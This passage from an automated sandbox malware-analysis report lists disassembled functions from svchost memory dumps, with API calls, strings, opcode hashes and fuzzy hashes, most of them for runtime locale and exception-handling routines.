            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
            • String ID: N/A$\s+
            • API String ID: 469901203-4167641992
            • Opcode ID: f4ed509622e860bc7b27e11ca4ab0ea1aeb907b098a98f9e442142f0a9928c68
            • Instruction ID: 5a6173d38d0134d2896cd2a85492da74657630819ae2b9751a34b73b20feaa24
            • Opcode Fuzzy Hash: f4ed509622e860bc7b27e11ca4ab0ea1aeb907b098a98f9e442142f0a9928c68
            • Instruction Fuzzy Hash: 3312B862A1CBC581EB62DB25E0407AE73A1FB96794F50C335DA9D07AA6DF7CD084CB04
            Function 00007FFA41845A70 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 353COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: ' to $Could not convert '$ing.$int
            • API String ID: 3668304517-2504206643
            • Opcode ID: dc925798f7f00755786379c880ab5f5a82b9b17f0e230689b8608f3ec79b1bf8
            • Instruction ID: 936f7e2d8eabcbdd8cec558605683e92ffa6d053d1f4ffb485a72283821a2893
            • Opcode Fuzzy Hash: dc925798f7f00755786379c880ab5f5a82b9b17f0e230689b8608f3ec79b1bf8
            • Instruction Fuzzy Hash: AFF1B062E1CB8581EB13EB35D4403BD6761FB96788F609231EA8D166A6EF7CF580C700
            Function 00007FFA41873CA4 Relevance: 12.6, Strings: 10, Instructions: 84COMMONLIBRARYCODE
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID: AreFileApisANSI$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
            • API String ID: 544645111-4046831456
            • Opcode ID: 374e437e81fee72c3d3a65cb7cf26b3976edcab2d670eda947539221e9f9a687
            • Instruction ID: b4bf00ec15f1368c19339afc93ba0319d740c424607d364ab259f1e8f1675494
            • Opcode Fuzzy Hash: 374e437e81fee72c3d3a65cb7cf26b3976edcab2d670eda947539221e9f9a687
            • Instruction Fuzzy Hash: 544185B1E0D60B90EB07BB55E9816E523A1AF5374AB88C436E41C17272DFBCB54AC341
            Function 6828C940 Relevance: 12.0, APIs: 8, Instructions: 50COMMON
            Download Yara Rule
            APIs
            • RtlCaptureContext.KERNEL32 ref: 6828C954
            • RtlLookupFunctionEntry.KERNEL32 ref: 6828C96B
            • RtlVirtualUnwind.KERNEL32 ref: 6828C9AD
            • SetUnhandledExceptionFilter.KERNEL32 ref: 6828C9F4
            • UnhandledExceptionFilter.KERNEL32 ref: 6828CA01
            • GetCurrentProcess.KERNEL32 ref: 6828CA07
            • TerminateProcess.KERNEL32 ref: 6828CA15
            • abort.MSVCRT ref: 6828CA1B
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
            • String ID:
            • API String ID: 4278921479-0
            • Opcode ID: a62c5bb7412ab743e846d4a6747dc65f387974b4e5a27c3ec64f4ee464831e3e
            • Instruction ID: 907bef7b485367586e7d5af050a26f2140c0965c287e774aed3a681ef61c9931
            • Opcode Fuzzy Hash: a62c5bb7412ab743e846d4a6747dc65f387974b4e5a27c3ec64f4ee464831e3e
            • Instruction Fuzzy Hash: D2213C79611B02D9FF048B56F86439937A6BB08BA9F408226D94E13774EF7AC1A4C350
            Function 00007FFA418814CC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 231COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
            • String ID: utf8
            • API String ID: 2487361160-905460609
            • Opcode ID: 0bfd6d178af608991e928dc1cf37b5cf8dec26144d8911be4b9e0768a28aa328
            • Instruction ID: 5440fcfe43f5c78c8882c78a887650b1d09af6e50b65af9f8927f336f6c436d7
            • Opcode Fuzzy Hash: 0bfd6d178af608991e928dc1cf37b5cf8dec26144d8911be4b9e0768a28aa328
            • Instruction Fuzzy Hash: 1591BD36A0C7828AEB27BB61D4416BA63A4EF46B88F48C135DE5D477A6DF3CF5458300
            Function 00007FFA41881F2C Relevance: 9.2, APIs: 6, Instructions: 171COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUserValue
            • String ID:
            • API String ID: 3482755877-0
            • Opcode ID: a4c5ae8edbfc5d69139923b3327011827f63cc8e8f4e6e3f78cc7af386c023b5
            • Instruction ID: 6f440a3c30c155a1c7d47b5ee629c645994f056f731054f2695923d5f3d7ac4e
            • Opcode Fuzzy Hash: a4c5ae8edbfc5d69139923b3327011827f63cc8e8f4e6e3f78cc7af386c023b5
            • Instruction Fuzzy Hash: 6C714762B1C64299EB23BB61D8506B823A2FF46B88F448135CA1D576A5EF3CF846C350
            Function 00007FFA41866A2C Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
            • String ID:
            • API String ID: 1239891234-0
            • Opcode ID: 04ee7bf9e3160090bd68060af936c8d3b213bfb7043eed21d055299f2e1ce715
            • Instruction ID: 57dd26c9f1e807915f7b4106ded5874cc7c6817b7d7903b68174a74a56d271da
            • Opcode Fuzzy Hash: 04ee7bf9e3160090bd68060af936c8d3b213bfb7043eed21d055299f2e1ce715
            • Instruction Fuzzy Hash: 93414F3261CB8186E762DF25E8403AE73B0FB897A8F544235EA8D46BA5DF3CD1558B00
            Function 00007FFA41881D34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID: ACP$OCP
            • API String ID: 2299586839-711371036
            • Opcode ID: 906ed29bd771f1fae28e7a9f14592884e8a8dbfebb1811ddeacdff81d7186a5a
            • Instruction ID: f3af8c95e8fa02d088e9d36fd74659bb8e874163d0b48989a4b2f7ab2f93394f
            • Opcode Fuzzy Hash: 906ed29bd771f1fae28e7a9f14592884e8a8dbfebb1811ddeacdff81d7186a5a
            • Instruction Fuzzy Hash: 0F114F21A1C6439BFB97FF52A54067A63A0FF46784F10D431EA4E876A5EF2CF8418740
            Function 00007FFA4182F720 Relevance: 6.3, APIs: 4, Instructions: 278COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 774aab6c5d84e6d95e48762101311a9cb8771486167b2139511246f904e85845
            • Instruction ID: 2d0a9b0121a13b8ec50d1da0d96c8add7669c2f57150d63e7a28f4f36ecfe42b
            • Opcode Fuzzy Hash: 774aab6c5d84e6d95e48762101311a9cb8771486167b2139511246f904e85845
            • Instruction Fuzzy Hash: DBA1B822B1C78586EB23AB26A40036AA351FB567D4F548235EEAD07BE6DF7CF441C700
            Function 682864E0 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: InfoLocale$strncmpstrtoul
            • String ID:
            • API String ID: 2149573502-0
            • Opcode ID: 474acadfda03ee1b901add7048b340572f97cfaef7de19b123f6c24da647dde7
            • Instruction ID: 2794244527accb634c04e781932744af81369bf3b8d7d80f3fe85dafbe55b027
            • Opcode Fuzzy Hash: 474acadfda03ee1b901add7048b340572f97cfaef7de19b123f6c24da647dde7
            • Instruction Fuzzy Hash: C921F9B332058582EF048B25ED457AA6393EB44BD5FC88135CAA9C769CEA6DC59D8300
            Function 00007FFA41850830 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FormatInfoLocaleMessage
            • String ID: !x-sys-default-locale
            • API String ID: 4235545615-2729719199
            • Opcode ID: ebab738b5480230e0b75425b37b28362b2ea768738c9a3c9646cf7035d34c8be
            • Instruction ID: 6bffafc75b852078d1e0b6b8520449f7123998dff717402fd4153e4b26cf7c1a
            • Opcode Fuzzy Hash: ebab738b5480230e0b75425b37b28362b2ea768738c9a3c9646cf7035d34c8be
            • Instruction Fuzzy Hash: 9901A171E1C78582E7539F12A840B6A67A2FB96BC8F448035DA4D46AA4CF3CE401CB40
            Function 68286680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: InfoLocalegetenv
            • String ID: GETTEXT_MUI
            • API String ID: 2555521601-170423343
            • Opcode ID: 89fa7b570720d1443cf1457af1e69c30a52156b8f6ea37245c8a65ad3bc83e3f
            • Instruction ID: b49fcd2a8cc74ed5b70951584eef059db10b4d9fdf0e1c9750844e1486022657
            • Opcode Fuzzy Hash: 89fa7b570720d1443cf1457af1e69c30a52156b8f6ea37245c8a65ad3bc83e3f
            • Instruction Fuzzy Hash: A8F06DB4720A6BD1EF549F16E8E03B12222FF10349FC48536C61E436A4EF6DC5A8C340
            Function 00007FFA41873744 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FFA41874BAA), ref: 00007FFA418737BD
              • Part of subcall function 00007FFA41873240: VirtualProtect.KERNEL32 ref: 00007FFA4187335D
              • Part of subcall function 00007FFA41873240: VirtualProtect.KERNEL32 ref: 00007FFA4187338E
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ProtectVirtual$InfoLocale
            • String ID: GetLocaleInfoEx
            • API String ID: 3721377114-2904428671
            • Opcode ID: cdb5dca6fce8f04672f1ac76295893a24b1d6bd1a07679733b4b96729e29bd1c
            • Instruction ID: 4d95357bc9439ce8a5cc6ef5c37d553806b589e527b54357f4cdb9c0db1249bb
            • Opcode Fuzzy Hash: cdb5dca6fce8f04672f1ac76295893a24b1d6bd1a07679733b4b96729e29bd1c
            • Instruction Fuzzy Hash: 0C018471B0CA8681EB03AB16A9404A9A790AF56BE4F58C635DE3C437F6DE7CF441C740
            Function 00007FFA41881830 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • EnumSystemLocalesW.KERNEL32(?,?,?,00007FFA41882031,?,00000000,00000092,?,?,00000000,?,00007FFA418749D7), ref: 00007FFA418818CE
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: EnumLocalesSystem
            • String ID:
            • API String ID: 2099609381-0
            • Opcode ID: 19eff94abd2ee9af0b536b7ed5e4bc3551f9b0ac4d3a1720833804b34edfc57f
            • Instruction ID: 82f0a6ffd473d13e1c05ff0921bf41761c93f453b903ca7b65755e961b093824
            • Opcode Fuzzy Hash: 19eff94abd2ee9af0b536b7ed5e4bc3551f9b0ac4d3a1720833804b34edfc57f
            • Instruction Fuzzy Hash: 2811D263E2C6458EEB17AF15D0806B87BA1EB41BA0F448235C66D433E0CF28E5D1C740
            Function 00007FFA41881900 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • EnumSystemLocalesW.KERNEL32(?,?,?,00007FFA41881FEC,?,00000000,00000092,?,?,00000000,?,00007FFA418749D7), ref: 00007FFA4188197E
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: EnumLocalesSystem
            • String ID:
            • API String ID: 2099609381-0
            • Opcode ID: 81d34820adff455eda3628da7156e63bcc0a57b6e9274a33e99e7bf0e383b950
            • Instruction ID: fc086cf80d7172f2573b5b5c02bcffc7bd252a7db804dd5d1e2cff0d37871f3b
            • Opcode Fuzzy Hash: 81d34820adff455eda3628da7156e63bcc0a57b6e9274a33e99e7bf0e383b950
            • Instruction Fuzzy Hash: E701B562F0C6854AE7176B16E8807B976A1EB42BA4F85C231D67D472E5DF68B4818700
            Function 00007FFA418731AC Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FFA41873708,?,?,?,?,?,?,?,?,00000000,00007FFA41880E60), ref: 00007FFA418731E2
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: EnumLocalesSystem
            • String ID:
            • API String ID: 2099609381-0
            • Opcode ID: 683c7a8f2507ae2b82dc6c3f6d9d014f294459f43e8d5f8831770356cdcd6c69
            • Instruction ID: d5c8e3b59078fdcc603d74dc7c65c8020fd2be9d94232e35277e8d7cf35edcd2
            • Opcode Fuzzy Hash: 683c7a8f2507ae2b82dc6c3f6d9d014f294459f43e8d5f8831770356cdcd6c69
            • Instruction Fuzzy Hash: FCF05E32A0CA4582E702EB55F98076973A1FB99B88F54C034D65D83775CF3CE490C700
            Function 00007FFA41873674 Relevance: 1.3, Strings: 1, Instructions: 41COMMONLIBRARYCODE
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID: EnumSystemLocalesEx
            • API String ID: 544645111-2492367753
            • Opcode ID: 6b8a00f93e1b2e292eb0bf6ff0e04f1641f2bbe8da5e8726a8779b7fa072daa7
            • Instruction ID: 085b9a3407452b3e81da8633d142174b87006a95bcc15cea6f7388ed1aa0d330
            • Opcode Fuzzy Hash: 6b8a00f93e1b2e292eb0bf6ff0e04f1641f2bbe8da5e8726a8779b7fa072daa7
            • Instruction Fuzzy Hash: AE118271A0DB4591DB03EB11E9800AAB3A0FB86790F448632FAAD037B5DF3CE505C740
            Function 682A1460 Relevance: .0, Instructions: 8COMMON
